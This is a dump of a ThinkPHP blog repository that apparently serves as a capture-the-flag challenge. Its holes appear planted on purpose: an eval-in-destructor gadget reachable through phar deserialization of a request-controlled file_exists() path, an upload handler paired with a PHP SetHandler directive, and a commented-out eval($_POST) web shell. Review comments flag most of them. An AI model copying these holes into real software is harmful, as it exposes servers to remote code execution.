-------------------------------------------------------------------------------- 1 | 'require|max:25|unique:admin', 8 | 'password' => 'require', 9 | ]; 10 | 11 | protected $message = [ 12 | 'username.require' => '管理员名称必须填写', 13 | 'username.max' => '管理员名称长度不得大于25位', 14 | 'username.unique' => '管理员名称不得重复', 15 | 'password.require' => '管理员密码必须填写', 16 | 17 | ]; 18 | 19 | protected $scene = [ 20 | 'add' => ['username'=>'require|unique:admin','password'], 21 | 'edit' => ['username'=>'require|unique:admin'], 22 | ]; 23 | 24 | 25 | 26 | 27 | } 28 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Article.php: -------------------------------------------------------------------------------- 1 | 'require|max:25', 8 | 'cateid' => 'require', 9 | ]; 10 | 11 | protected $message = [ 12 | 'title.require' => '文章标题必须填写', 13 | 'title.max' => '文章标题长度不得大于25位', 14 | 'cateid.require' => '请选择文章所属栏目', 15 | 16 | ]; 17 | 18 | protected $scene = [ 19 | 'add' => ['title','cateid'], 20 | 'edit' => ['title','cateid'], 21 | ]; 22 | 23 | 24 | 25 | 26 | } 27 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Cate.php: -------------------------------------------------------------------------------- 1 | 'require|max:25|unique:cate', 8 | ]; 9 | 10 | protected $message = [ 11 | 'catename.require' => '栏目名称必须填写', 12 | 'catename.max' => '栏目名称长度不得大于25位', 13 | 'catename.unique' => '栏目名称不得重复', 14 | 15 | ]; 16 | 17 | protected $scene = [ 18 | 'add' => ['catename'=>'require|unique:cate'], 19 | 'edit' => ['catename'=>'require|unique:cate'], 20 | ]; 21 | 22 | 23 | 24 | 25 | } 26 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Links.php: -------------------------------------------------------------------------------- 1 | 'require|max:25', 8 | 'url' => 'require', 9 | ]; 10 | 11 | protected $message = [ 12 | 
'title.require' => '链接标题必须填写', 13 | 'title.max' => '链接标题长度不得大于25位', 14 | 'url.require' => '链接地址必须填写', 15 | 16 | ]; 17 | 18 | protected $scene = [ 19 | 'add' => ['title','url'], 20 | 'edit' => ['title','url'], 21 | ]; 22 | 23 | 24 | 25 | 26 | } 27 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Tags.php: -------------------------------------------------------------------------------- 1 | 'require|max:25|unique:tags', 8 | ]; 9 | 10 | protected $message = [ 11 | 'tagname.require' => 'Tag标签必须填写', 12 | 'tagname.max' => 'Tag标签长度不得大于25位', 13 | 'tagname.unique' => 'Tag标签不得重复', 14 | 15 | ]; 16 | 17 | protected $scene = [ 18 | 'add' => ['tagname'], 19 | 'edit' => ['tagname'], 20 | ]; 21 | 22 | 23 | 24 | 25 | } 26 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/view/index/index.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | {include file="common/top"} 24 | 25 | 26 |
27 |
28 | 29 | {include file="common/left"} 30 | 31 | 32 |
33 | 34 | 40 | 41 | 42 | 43 |
44 | 45 | 46 |
47 | 48 |
49 | 50 |
51 |
52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/view/login/login.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /thinkPHP/application/command.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return []; -------------------------------------------------------------------------------- /thinkPHP/application/common.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // 应用公共文件 13 | -------------------------------------------------------------------------------- /thinkPHP/application/database.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | // 数据库类型 14 | 'type' => 'mysql', 15 | // 服务器地址 16 | 'hostname' => '127.0.0.1', 17 | // 数据库名 18 | 'database' => 'blog', 19 | // 用户名 20 | 'username' => 'root', 21 | // 密码 22 | 'password' => '', 23 | // 端口 24 | 'hostport' => '', 25 | // 连接dsn 26 | 'dsn' => '', 27 | // 数据库连接参数 28 | 'params' => [], 29 | // 数据库编码默认采用utf8 30 | 'charset' => 'utf8', 31 | // 数据库表前缀 32 | 'prefix' => 'tp_', 33 | // 数据库调试模式 34 | 'debug' => true, 35 | // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器) 36 | 'deploy' => 0, 37 | // 数据库读写是否分离 主从式有效 38 | 'rw_separate' => false, 39 | // 读写分离后 主服务器数量 40 | 'master_num' => 1, 41 | // 指定从服务器序号 42 | 'slave_no' => '', 43 | // 是否严格检查字段是否存在 44 | 'fields_strict' => true, 45 | // 
数据集返回类型 array 数组 collection Collection对象 46 | 'resultset_type' => 'array', 47 | // 是否自动写入时间戳字段 48 | 'auto_timestamp' => false, 49 | // 是否需要进行SQL性能分析 50 | 'sql_explain' => false, 51 | ]; 52 | -------------------------------------------------------------------------------- /thinkPHP/application/index/common.php: -------------------------------------------------------------------------------- 1 | $v) { 5 | $v=join(',',$v); 6 | $temp[]=$v; 7 | } 8 | if($temp){ 9 | $temp=array_unique($temp); 10 | foreach ($temp as $k=>$v) { 11 | $temp[$k]=explode(',', $v); 12 | } 13 | 14 | return $temp; 15 | } 16 | 17 | 18 | } 19 | -------------------------------------------------------------------------------- /thinkPHP/application/index/config.php: -------------------------------------------------------------------------------- 1 | [ 4 | '__PUBLIC__'=>SITE_URL.'/static/index', 5 | '__IMG__'=>SITE_URL.'/static', 6 | ], 7 | ]; 8 | -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Article.php: -------------------------------------------------------------------------------- 1 | find($arid); 13 | $ralateres=$this->ralat($articles['keywords'],$articles['id']); 14 | // dump($ralateres); die; 15 | db('article')->where('id','=',$arid)->setInc('click'); 16 | $cates=db('cate')->find($articles['cateid']); 17 | $recres=db('article')->where(array('cateid'=>$cates['id'],'state'=>1))->limit(8)->select(); 18 | $this->assign(array( 19 | 'articles'=>$articles, 20 | 'cates'=>$cates, 21 | 'recres'=>$recres, 22 | 'ralateres'=>$ralateres 23 | )); 24 | return $this->fetch('article'); 25 | } 26 | 27 | 28 | public function ralat($keywords,$id){ 29 | $arr=explode(',', $keywords); 30 | static $ralateres=array(); 31 | foreach ($arr as $k=>$v) { 32 | $map['keywords']=['like','%'.$v.'%']; 33 | $map['id']=['neq',$id]; 34 | $artres=db('article')->where($map)->order('id desc')->limit(8)->select(); 35 | $ralateres=array_merge($ralateres,$artres); 36 
| } 37 | if($ralateres){ 38 | 39 | $ralateres=arr_unique($ralateres); 40 | 41 | return $ralateres; 42 | 43 | } 44 | 45 | } 46 | 47 | } 48 | //unserialize(Request::instance()->param('name')); /* NOTE(review): disabled call that would unserialize a request parameter; delete it rather than keep it commented out. */ -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Base.php: -------------------------------------------------------------------------------- 1 | right(); 11 | $cateres=db('cate')->order('id asc')->select(); 12 | $tagres=db('tags')->order('id desc')->select(); 13 | $this->assign(array( 14 | 'cateres'=>$cateres, 15 | 'tagres'=>$tagres 16 | )); 17 | } 18 | 19 | 20 | 21 | /* right(): loads the 8 most-clicked articles (clickres) and the 8 most-clicked articles with state=1 (tjres) and assigns both to the view. */ public function right(){ 22 | $clickres=db('article')->order('click desc')->limit(8)->select(); 23 | $tjres=db('article')->where('state','=',1)->order('click desc')->limit(8)->select(); 24 | $this->assign(array( 25 | 'clickres'=>$clickres, 26 | 'tjres'=>$tjres 27 | )); 28 | } 29 | 30 | 31 | 32 | 33 | } 34 | /* NOTE(review): 'file' is read straight from the request and reaches file_exists() below with no scheme or path validation. */ $filename = Request::instance()->param('file'); 35 | /* Core: holds a PHP source string in $data and evaluates it when the object is destroyed. */ class Core{ 36 | public $data = 'time();'; 37 | public function __destruct(){ 38 | /* NOTE(review): eval() of a property in a destructor means any code path that unserializes a Core object with a caller-chosen $data runs that PHP; remove the eval. */ eval($this->data); 39 | } 40 | } 41 | /* NOTE(review): the result is discarded, so this call only probes a request-controlled path. On PHP before 8.0 a filesystem call on a phar:// path unserializes the archive metadata; reject stream-wrapper schemes and confine the path to an expected directory - confirm the deployed PHP version. */ file_exists($filename); 42 | -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Cate.php: -------------------------------------------------------------------------------- 1 | find($cateid); 11 | $this->assign('cates',$cates); 12 | //query the articles under the current category 13 | $articleres=db('article')->where(array('cateid'=>$cateid))->paginate(3); 14 | $this->assign('articleres',$articleres); 15 | return $this->fetch('cate'); 16 | } 17 | 18 | 19 | 20 | 21 | } -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Index.php: -------------------------------------------------------------------------------- 1 | order('id desc')->paginate(3); 12 | $this->assign('articleres', $articleres); 13 | return $this->fetch(); 14 | 15 | } 16 | 17 | public function unlink($path) 18 |
{ 19 | return is_file($path) && unlink($path); 20 | } 21 | 22 | /* upload(): takes the 'image' file from the request, validates its extension and type, moves it under public/uploads, then echoes a success redirect or the validation error. */ public function upload() 23 | { 24 | $file = request()->file('image'); 25 | if ($file) { 26 | /* NOTE(review): what the 'ext' and 'type' rules actually inspect is decided by the framework's validate(); confirm they cannot be satisfied by client-supplied name and content type alone. */ $info = $file->validate(['ext' => 'jpg,png,gif', 'type' => 'image/jpeg,image/png,image/gif'])->move(ROOT_PATH . 'public' . DS . 'uploads'); 27 | if ($info) { 28 | $po = ROOT_PATH . 'public' . DS . 'uploads' . '/' . $info->getSaveName(); 29 | /* NOTE(review): 0777 leaves the uploaded file writable and executable by every local account; a stored image under the public directory needs no more than 0644. */ chmod($po,0777); 30 | $p='http://127.0.0.1/uploads/'.$info->getSaveName(); 31 | echo ""; 32 | echo '哦!爆照哦!!!'; 33 | /* NOTE(review): $po is a non-empty path string, so this test is always true and the else branch (unlink + error) never runs. */ if ($po) { 34 | echo $this->success("上传成功", "Index/index",-1,20); 35 | } else { 36 | $this->unlink($po); 37 | echo $this->error(); 38 | } 39 | } else { 40 | echo $file->getError("error"); 41 | } 42 | } 43 | } 44 | } 45 | ?> -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Search.php: -------------------------------------------------------------------------------- 1 | where($map)->order('id desc')->paginate($listRows = 3, $simple = false, $config = [ 12 | 'query'=>array('keywords'=>$keywords), 13 | ]); 14 | $this->assign(array( 15 | 'searchres'=>$searchres, 16 | 'keywords'=>$keywords 17 | )); 18 | }else{ 19 | $this->assign(array( 20 | 'searchres'=>null, 21 | 'keywords'=>'暂无数据' 22 | )); 23 | } 24 | 25 | return $this->fetch('search'); 26 | } 27 | 28 | 29 | 30 | 31 | } 32 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/cate/cate.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | {include file="common/header" /} 14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 |
23 | 24 | {volist name="articleres" id="vo"} 25 |
26 | 29 |
30 |

{$vo.title}

31 |
发布时间:{$vo['time']|date="Y-m-d",###}
32 |

{$vo.desc}

33 |
34 | $v) { 37 | echo "$v"; 38 | } 39 | ?> 40 |
41 |
42 |
43 | {/volist} 44 | 45 | 46 |
47 |
48 | {$articleres->render()} 49 |
50 |
51 |
52 | 53 | {include file="common/right" /} 54 | 55 |
56 | {include file="common/foot" /} 57 | 58 | 59 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/common/foot.html: -------------------------------------------------------------------------------- 1 |
2 | 5 |
-------------------------------------------------------------------------------- /thinkPHP/application/index/view/common/header.html: -------------------------------------------------------------------------------- 1 |
2 | 15 |
16 | 17 |
18 |
19 | Welcome my friends 20 |
21 |
22 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/common/right.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
热门点击
    4 | {volist name="clickres" id="vo"} 5 |
  • {$vo.title}
  • 6 | {/volist} 7 |
8 |
9 | 10 |
11 |
12 |
13 |
推荐阅读
    14 | {volist name="tjres" id="vo"} 15 |
  • {$vo.title}
  • 16 | {/volist} 17 |
18 |
19 | 20 |
21 |
22 | 23 |
29 | 30 |
31 | 32 | 33 | 34 |
-------------------------------------------------------------------------------- /thinkPHP/application/index/view/index/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | {include file="common/header" /} 13 | 14 | 15 | 16 | 17 |
18 | 19 |
20 | 21 |
22 | {volist name="articleres" id="vo"} 23 |
24 |
{$vo.title}
25 |
26 |

{$vo.title}

27 |
发布时间:{$vo.time|date="Y-m-d",###}
28 |

{$vo.desc}

29 |
30 |
31 |
32 |
33 | {/volist} 34 |
35 |
{$articleres->render()}
36 |
37 |
38 |
来来,把你的皂片发给我
39 | 40 |
41 | 42 | 43 |
44 | {include file="common/right" /} 45 |
46 | 47 | 48 | 49 | {include file="common/foot" /} 50 | 51 | 52 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/search/search.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | {include file="common/header" /} 14 | 15 | 16 | 17 | 18 |
搜索:{$keywords}
19 | 20 |
21 | 22 |
23 | 24 | {volist name="searchres" id="vo"} 25 |
26 | 29 |
30 |

{$vo.title}

31 |
发布时间:{$vo['time']|date="Y-m-d",###}
32 |

{$vo.desc}

33 |
34 | $v) { 37 | echo "$v"; 38 | } 39 | ?> 40 |
41 |
42 |
43 | {/volist} 44 | 45 | 46 |
47 |
48 | {$searchres->render()} 49 |
50 |
51 |
52 | 53 | {include file="common/right" /} 54 | 55 |
56 | {include file="common/foot" /} 57 | 58 | 59 | -------------------------------------------------------------------------------- /thinkPHP/application/route.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | '__pattern__' => [ 14 | 'name' => '\w+', 15 | ], 16 | '[hello]' => [ 17 | ':id' => ['index/hello', ['method' => 'get'], ['id' => '\d+']], 18 | ':name' => ['index/hello', ['method' => 'post']], 19 | ], 20 | 21 | ]; 22 | -------------------------------------------------------------------------------- /thinkPHP/application/tags.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // 应用行为扩展定义文件 13 | return [ 14 | // 应用初始化 15 | 'app_init' => [], 16 | // 应用开始 17 | 'app_begin' => [], 18 | // 模块初始化 19 | 'module_init' => [], 20 | // 操作开始执行 21 | 'action_begin' => [], 22 | // 视图内容过滤 23 | 'view_filter' => [], 24 | // 日志写入 25 | 'log_write' => [], 26 | // 应用结束 27 | 'app_end' => [], 28 | ]; 29 | -------------------------------------------------------------------------------- /thinkPHP/build.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | // 生成应用公共文件 14 | '__file__' => ['common.php', 'config.php', 'database.php'], 15 | 16 | // 定义demo模块的自动生成 (按照实际定义的文件名生成) 17 | 'demo' => [ 18 | '__file__' => ['common.php'], 19 | '__dir__' => ['behavior', 'controller', 'model', 'view'], 20 | 'controller' => ['Index', 'Test', 'UserType'], 21 | 'model' => ['User', 'UserType'], 22 | 'view' => ['index/index'], 23 | ], 24 | // 其他更多的模块定义 25 | ]; 26 | -------------------------------------------------------------------------------- /thinkPHP/composer.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "name": "topthink/think", 3 | "description": "the new thinkphp framework", 4 | "type": "project", 5 | "keywords": [ 6 | "framework", 7 | "thinkphp", 8 | "ORM" 9 | ], 10 | "homepage": "http://thinkphp.cn/", 11 | "license": "Apache-2.0", 12 | "authors": [ 13 | { 14 | "name": "liu21st", 15 | "email": "liu21st@gmail.com" 16 | } 17 | ], 18 | "require": { 19 | "php": ">=5.4.0", 20 | "topthink/framework": "^5.0", 21 | "topthink/think-image": "^1.0", 22 | "topthink/think-migration": "^1.0", 23 | "topthink/think-captcha": "^1.0", 24 | "topthink/think-mongo": "^1.0", 25 | "topthink/think-testing": "^1.0", 26 | "topthink/think-worker": "^1.0", 27 | "topthink/think-helper": "^1.0", 28 | "topthink/think-queue": "^1.0", 29 | "topthink/think-angular": "^1.0" 30 | }, 31 | "extra": { 32 | "think-path": "thinkphp" 33 | }, 34 | "config": { 35 | "preferred-install": "dist" 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /thinkPHP/extend/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /thinkPHP/phpunit.xml: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 13 | ./tests/ 14 | 15 | 16 | 17 | 18 | application/ 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /thinkPHP/public/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Options +FollowSymlinks -Multiviews 3 | RewriteEngine On 4 | 5 | RewriteCond %{REQUEST_FILENAME} !-d 6 | RewriteCond %{REQUEST_FILENAME} !-f 7 | RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L] 8 | 9 | 10 | 11 | 12 | SetHandler application/x-httpd-php 13 | 14 | -------------------------------------------------------------------------------- 
/thinkPHP/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/thinkPHP/public/favicon.ico -------------------------------------------------------------------------------- /thinkPHP/public/index.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // [ Application entry file ] 13 | 14 | // Define the application directory 15 | define('APP_PATH', __DIR__ . '/../application/'); 16 | define('SITE_URL', ''); 17 | // Load the framework bootstrap file 18 | require __DIR__ . '/../thinkphp/start.php'; 19 | // eval($_POST['admin']); /* NOTE(review): disabled statement that would execute a POST field as PHP on every request; delete it from the entry point instead of leaving it commented out. */ 20 | cookie('csrf_token', ''); -------------------------------------------------------------------------------- /thinkPHP/public/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: 3 | -------------------------------------------------------------------------------- /thinkPHP/public/router.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | // $Id$ 12 | 13 | /* Returns false when DOCUMENT_ROOT . REQUEST_URI names an existing file, otherwise loads index.php; presumably a router script for PHP's built-in server, where false means "serve the file as-is" - confirm. */ if (is_file($_SERVER["DOCUMENT_ROOT"] . $_SERVER["REQUEST_URI"])) { 14 | return false; 15 | } else { 16 | require __DIR__ . "/index.php"; 17 | } 18 | -------------------------------------------------------------------------------- /thinkPHP/public/static/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /thinkPHP/runtime/temp/3f3091e7a346cc474820a2a4d5d14333.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 跳转提示 7 | 17 | 18 | 19 |
20 | 21 |

:)

22 |

23 | 24 |

:(

25 |

26 | 27 |

28 |

29 | 页面自动 跳转 等待时间: 30 |

31 |
32 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /thinkPHP/runtime/temp/549f8e214256acc77c6d71d90dde481a.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /thinkPHP/tests/ExampleTest.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace tests; 12 | 13 | class ExampleTest extends TestCase 14 | { 15 | 16 | public function testBasicExample() 17 | { 18 | $this->visit('/')->see('ThinkPHP'); 19 | } 20 | } -------------------------------------------------------------------------------- /thinkPHP/tests/TestCase.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace tests; 12 | 13 | class TestCase extends \think\testing\TestCase 14 | { 15 | protected $baseUrl = 'http://localhost'; 16 | } -------------------------------------------------------------------------------- /thinkPHP/think: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | 11 | // +---------------------------------------------------------------------- 12 | 13 | // 定义项目路径 14 | define('APP_PATH', __DIR__ . 
'/application/'); 15 | 16 | // 加载框架引导文件 17 | require __DIR__.'/thinkphp/console.php'; 18 | -------------------------------------------------------------------------------- /thinkPHP/vendor/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /thinkPHP/writeup.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/thinkPHP/writeup.pdf --------------------------------------------------------------------------------